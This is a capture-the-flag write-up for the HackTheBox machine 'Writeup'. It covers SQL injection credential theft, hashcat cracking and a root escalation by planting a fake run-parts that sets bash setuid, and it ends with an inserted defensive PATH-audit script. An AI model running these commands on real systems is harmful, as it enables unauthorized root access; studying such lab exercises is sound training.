HTB-Writeup

metafa1ica
ip='10.129.253.209'
# full TCP port sweep first, then collect the open ports as a comma-separated list for the scripted/version scan
ports=$(nmap -p- --min-rate=1000 -T4 "$ip" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -p"$ports" -sC -sV "$ip"

Ports 22 and 80 are open.


The page warns about DoS protection: a handful of requests gets the IP banned for a while, so brute forcing is clearly not an option.

It hints at vim, so there should be a vim backup file.

Page is hand-crafted with vi.

Tried .index.html.swp, .index.html.swo and .index.html.swn; none of them worked.

robots.txt lists an entry.


CMS Made Simple

The site runs CMS Made Simple.


There is an admin login page:

http://10.129.253.209/writeup/admin/login.php

There is a SQL injection from 2019, CVE-2019-9053.

Running it gives:

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

The hash still has to be cracked:

echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > hash
hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt

The password is raykayjay9.

Ridiculous: I could not log in to the admin panel no matter what, and it turns out the login is over SSH. What is wrong with this box.


Privilege escalation

jkr@writeup:/tmp$ pkexec --version
pkexec version 0.105

The one-click privilege escalation failed.


The staff group

jkr@writeup:/tmp$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

The staff group here is not a standard Debian group.

# see which files on the system belong to the staff group
jkr@writeup:/tmp$ find / -group staff -type f 2>/dev/null
# list the directories that are group-writable for staff
jkr@writeup:/tmp$ find / -group staff -type d -perm -g+w 2>/dev/null
/var/local
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/ca-certificates
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin

Focus on these two directories; both are writable:

jkr@writeup:/tmp$ ls -ld /usr/local/bin/ /usr/local/sbin/
drwx-wsr-x 2 root staff 20480 Apr 19 2019 /usr/local/bin/
drwx-wsr-x 2 root staff 12288 Apr 19 2019 /usr/local/sbin/

The next step is to find a program that is triggered under some condition, runs as root, and involves the directories above.

https://github.com/DominicBreuker/pspy

Right now the only way to interact with the system is an SSH login, so start pspy32 in one window and log in again from another.

This captures the commands triggered during the SSH login.


Hijacking

The first observation: the two paths we can write to, /usr/local/bin and /usr/local/sbin, are placed in the PATH environment variable, after which run-parts is executed, as root.

CMD: UID=0    PID=2576   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
CMD: UID=0 PID=2577 | run-parts --lsbsysinit /etc/update-motd.d

Looking up run-parts shows that its default location is /bin/run-parts.

jkr@writeup:~$ which run-parts
/bin/run-parts

Clearly, creating a run-parts in either /usr/local/bin or /usr/local/sbin makes the system execute the malicious command first, which is the hijack.

With it placed in /usr/local/bin, the SSH login looks about the same as usual.

echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/sbin/run-parts; chmod +x /usr/local/sbin/run-parts
echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/bin/run-parts; chmod +x /usr/local/bin/run-parts

Log in over SSH again.
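As an added example (not code from the writeup), a small Python audit that parses `ls -ld` output and reports which directories in a root-run job's PATH can be written to by a non-root user ahead of the command's real location, which is exactly the condition the run-parts hijack above depends on. The `ls` lines and the PATH are constructed to mirror the box's listing and the pspy capture; `shadowing_dirs` and the other function names are mine.

```python
"""Audit a root-run job's PATH for directories a non-root user can write to that
are searched before a command's real location (the run-parts hijack above)."""
import posixpath
# Constructed `ls -ld` output modelled on the box's listing (not copied output).
LS_LINES = """\
drwx-wsr-x 2 root staff 20480 Apr 19 2019 /usr/local/bin/
drwx-wsr-x 2 root staff 12288 Apr 19 2019 /usr/local/sbin/
drwxr-xr-x 2 root root 4096 Apr 19 2019 /usr/sbin/
drwxr-xr-x 2 root root 4096 Apr 19 2019 /usr/bin/
drwxr-xr-x 2 root root 4096 Apr 19 2019 /sbin/
drwxr-xr-x 2 root root 4096 Apr 19 2019 /bin/
"""
MOTD_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"  # PATH seen in the pspy capture

def parse_ls(text):
    """Map directory -> (mode, owner, group) from `ls -ld` lines."""
    dirs = {}
    for line in text.splitlines():
        f = line.split()
        if len(f) < 9 or not f[0].startswith("d"):
            continue  # blank, malformed, or not a directory
        dirs[f[-1].rstrip("/") or "/"] = (f[0], f[2], f[3])
    return dirs

def writable_by_non_root(mode, owner, group):
    """True if a non-root principal can create files in the directory.
    mode is ls's 10-char string: d, owner rwx, group rws, other rwt."""
    if owner != "root" and mode[2] == "w":
        return True
    if group != "root" and mode[5] == "w":  # 'w' stays even with setgid ('s')
        return True
    return mode[8] == "w"  # world-writable; a sticky bit still allows new files

def shadowing_dirs(path, real_binary, dirs):
    """Directories searched before real_binary's directory that a non-root user
    could drop a same-named file into; unlisted directories are flagged too."""
    real_dir = posixpath.dirname(real_binary)
    hits = []
    for d in path.split(":"):
        d = d.rstrip("/") or "/"
        if d == real_dir:
            break  # later entries are never reached for this command
        if d not in dirs or writable_by_non_root(*dirs[d]):
            hits.append(d)
    return hits

if __name__ == "__main__":
    for d in shadowing_dirs(MOTD_PATH, "/bin/run-parts", parse_ls(LS_LINES)):
        print(f"WARNING: {d} precedes /bin in PATH and is writable by non-root")
```

On a live host the same check can be fed the output of `ls -ld $(echo "$PATH" | tr ':' ' ')` for the PATH that cron, PAM or update-motd actually uses, and the fix is to drop the group write bit on the flagged directories or to stop putting them ahead of /usr/bin and /bin in root's PATH.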


  • Title: HTB-Writeup
  • Author: metafa1ica
  • Created: 2025-08-02 17:24:39
  • Updated: 2025-08-17 13:29:28
  • Link: https://metafa1ica.github.io/post/d9ab780b6d17/
  • License: This article is licensed under CC BY-NC-SA 4.0.